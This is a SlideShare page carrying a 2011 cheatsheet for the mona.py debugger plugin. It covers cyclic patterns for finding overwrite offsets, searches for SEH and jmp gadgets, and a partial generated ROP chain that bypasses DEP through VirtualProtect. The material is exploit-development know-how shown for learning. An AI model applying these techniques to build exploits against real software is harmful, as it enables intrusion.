Mona cheatsheet

975 views
883 views

Published on

A short list of mona.py commands, useful for start to play with her :)

Published in: Lifestyle, Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
975
On SlideShare
0
From Embeds
0
Number of Embeds
8
Actions
Shares
0
Downloads
48
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Mona cheatsheet

  1. 1. ===========================A LITTLE MONA.PY CHEATSHEET===========================Last Modify: 08/12/2011Author: luca.mella@studio.unibo.it*************************************************************************** Configuration ******************************************************************************************************************************!mona config -set workingfolder c:logs%p Set the current working directory. Mona will put output here. You might use -get alse for retrive current working folder. (%p means processname)-cm <option>=true/false safeseh aslr os rebase*************************************************************************** General searching options ******************************************************************************************************************-cp <option>,<option> nonull unicode 00xx00yy ascii asciiprint upper lower uppernum lowernum numeric alphanum startswithnull 00xxyyzz-cpb <badchars> Exclude specified badchars from pointer search-p <N> Number of pointers to return-x <level> R,W,X,RW,RX,WX,RWX,* pointers that point to a segment with specifiedaccess level*************************************************************************** Pattern ************************************************************************************************************************************!mona pc <size> Create a cyclic pattern of <size> bytes. Same of "msf_pattern" in metasploit!mona po <0x4bytes> find the offset of specified bytes in cyclic pattern
  2. 2. *************************************************************************** After a crash with cyclic pattern payload **************************************************************************************************!mona suggest Watch for output.. EIP overwritten with normal pattern : 0x37694136 (offset 260) !!! %EBP+4 ESP (0x0018f574) points at offset 264 in normal pattern (length 736) EBP overwritten with normal pattern : 0x69413569 (offset 256) EBX (0x0018f580) points at offset 276 in normal pattern (length 724) --- output --- 0BADF00D [+] Processing arguments and criteria 0BADF00D - Pointer access level : X 0BADF00D [+] Looking for cyclic pattern in memory 750F0000 Modules C:WindowsSystem32wshtcpip.dll 0BADF00D Cyclic pattern (normal) found at 0x0018f46c (length 1000bytes) 0BADF00D Cyclic pattern (normal) found at 0x001c3961 (length 1000bytes) 0BADF00D [+] Examining registers 0BADF00D EIP overwritten with normal pattern : 0x37694136 (offset 260) 0BADF00D ESP (0x0018f574) points at offset 264 in normal pattern(length 736) 0BADF00D EBP overwritten with normal pattern : 0x69413569 (offset 256) 0BADF00D EBX (0x0018f580) points at offset 276 in normal pattern(length 724) 0BADF00D [+] Examining SEH chain 0BADF00D [+] Examining stack 0BADF00D Pointer into normal cyclic pattern at ESP-0x1e8 (-488) :0x0018f580 : offset 276, length 724 0BADF00D Pointer into normal cyclic pattern at ESP-0x19c (-412) :0x001c396d : offset 12, length 988 0BADF00D Pointer into normal cyclic pattern at ESP-0x174 (-372) :0x0018f46c : offset 0, length 1000 0BADF00D Pointer into normal cyclic pattern at ESP-0x170 (-368) :0x001c396d : offset 12, length 988 0BADF00D Pointer into normal cyclic pattern at ESP-0x164 (-356) :0x0018f580 : offset 276, length 724 0BADF00D Pointer into normal cyclic pattern at ESP-0x154 (-340) :0x0018f56c : offset 256, length 744 0BADF00D Pointer into normal cyclic pattern at ESP-0x134 (-308) :0x0018f580 : offset 276, length 724 0BADF00D Pointer into normal cyclic pattern at ESP-0x114 (-276) :0x0018f46c : offset 0, length 1000 0BADF00D Pointer into normal cyclic pattern at ESP-0x110 (-272) :0x0018f46c : offset 0, length 1000 0BADF00D Pointer into normal cyclic pattern at ESP-0x10c (-268) :0x0018f580 : offset 276, length 724 0BADF00D [+] Preparing log file exploit.rb 0BADF00D - (Re)setting logfile C:mona_logsexploit.rb 0BADF00D [+] Generating module info table, hang on... 0BADF00D - Processing modules 0BADF00D - Done. Lets rock n roll. --- end of output ---
  3. 3. *************************************************************************** Finding things in memory *******************************************************************************************************************!mona find Find a sequence of bytes in memory. Mandatory argument : -s <pattern> : the sequence to search for. -type <type> : Type of pattern to search for : bin,asc,ptr,instr,file -b <address> : the bottom of the search range -t <address> : the top of the search range -c : skip consecutive pointers but show length of the pattern instead -p2p : show pointers to pointers to the pattern (might take a while !) -r <number> : if p2p is used, you can tell the find to also find closepointers by specifying -r with a value. This value indicates the number of bytes to stepbackwards for each search!mona find -type instr -s "jmp ebx" -m ntdll.dll --- output --- Search into module ntdll.dll Search for "jmp ebx" as assembly instruction Result: 0x77e5172b (b+0x0007172b) : "jmp ebx" | {PAGE_EXECUTE_READ} [ntdll.dll]ASLR: True, Rebase: True, SafeSEH: True, OS: True,v6.1.7600.16385 (C:WindowsSysWOW64ntdll.dll) --- end of output ---*************************************************************************** Assemble instructions **********************************************************************************************************************!mona assemble -s "nop" Return the opcode of specified instructions (chain with #).*************************************************************************** Searching for POP/POP/RET instruction (SEH exploiting) ***********************************************************************************!mona seh Find POP POP RET instruction into program memory. This statements could be used in SEH exploiting. --- output --- 0BADF00D [+] Writing results to C:mona_logsseh.txt 0BADF00D - Number of pointers of type pop ebx # pop eax # ret : 3 0BADF00D - Number of pointers of type pop esi # pop edi # ret : 3 0BADF00D - Number of pointers of type pop ecx # pop ebx # ret : 1 0BADF00D - Number of pointers of type pop ebx # pop ebp # ret : 3 0BADF00D - Number of pointers of type pop ebx # pop eax # ret 04 : 2 0BADF00D - Number of pointers of type pop ebx # pop ecx # ret : 15 0BADF00D - Number of pointers of type pop ecx # pop edi # ret : 1 0BADF00D - Number of pointers of type pop ebx # pop ecx # ret 0c : 1 0BADF00D - Number of pointers of type pop esi # pop ebx # ret : 6 0BADF00D - Number of pointers of type jmp dword ptr ss:[esp+14] : 1 0BADF00D - Number of pointers of type pop esi # pop ebx # ret 08 : 2
  4. 4. 0BADF00D - Number of pointers of type call dword ptr ss:[ebp-04] : 1 0BADF00D - Number of pointers of type pop esi # pop ebx # ret 04 : 2 0BADF00D - Number of pointers of type call dword ptr ss:[esp+14] : 1 0BADF00D - Number of pointers of type pop ebx # pop ecx # ret 04 : 14 0BADF00D - Number of pointers of type call dword ptr ss:[ebp-18] : 1 0BADF00D - Number of pointers of type pop edi # pop ebx # ret : 1 [..] --- end of output ---*************************************************************************** ROP based exploit *******************************************************************************************************!mona rop -m <NONASLRMODULES> Analyze memory prepare several lists of ROP valid gadget (any INSTR + RETsequence), stack pivots, rop functions, Generate a ROP chain aimed to bypass DEP (call to VirtualProtect with PUSHADtechnique), and suggest wich address need to be fixed for make it works. NOTE: Watch "C:mona_logsrop_suggestion.txt" for a clear gadget list. Watch "C:mona_logsrop_virtualprotect.txt" for a starting point foryour rop payload (aimed to DEP bypass). Watch "C:mona_logsstack_pivot.txt" for a list of gadget that permitto change ESP. --- output --- ---------- Mona command started on 2011-07-21 10:58:09 ---------- [..] VirtualProtect register structure (PUSHAD technique) ---------------------------------------------------- EAX = NOP (0x90909090) ECX = lpOldProtect (Writable ptr) EDX = NewProtect (0x40) EBX = Size ESP = lPAddress (automatic) EBP = ReturnTo (ptr to jmp esp - run !mona jmp -r esp -n -o) ESI = ptr to VirtualProtect() EDI = ROP NOP (RETN) VirtualProtect() pushad rop chain ------------------------------------ rop_gadgets = [ 0x00404880, # POP ECX # RETN (server.exe) 0x????????, # <- *&VirtualProtect() 0x00406a48, # MOV EAX,DWORD PTR DS:[ECX]# ADD EAX,ECX # RETN (server.exe) 0x????????, # ** <- find routine to movevirtualprotect() into esi # ** Hint : look formov [esp+offset],eax and pop esi 0x????????, # couldnt find a pointer toput ptr to jmp esp into ebp 0x????????, # <- put pointer to payloadhere
  5. 5. 0x00403e04, # POP EBX # RETN (server.exe) 0x00000201, # <- change size to mark asexecutable if needed (-> ebx) 0x00404880, # POP ECX # RETN (server.exe) 0x00409000, # RW pointer (lpOldProtect)(-> ecx) 0x00404be4, # POP EDI # RETN (server.exe) 0x00404be5, # ROP NOP (-> edi) 0x0040431c, # POP EDX # RETN (server.exe) 0x00000040, # newProtect (0x40) (-> edx) 0x00404a84, # POP EAX # RETN (server.exe) 0x90909090, # NOPS (-> eax) 0x004022e0, # PUSHAD # RETN (server.exe) # rop chain generated by mona.py # note : this chain may not work out of the box # you may have to change order or fix somegadgets, # but it should give you a head start ].pack("V*") [..] --- end of output ---======================================================================================Reference: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ https://www.corelan.be/index.php/2011/05/12/hack-notes-ropping-eggs-for-breakfast/

×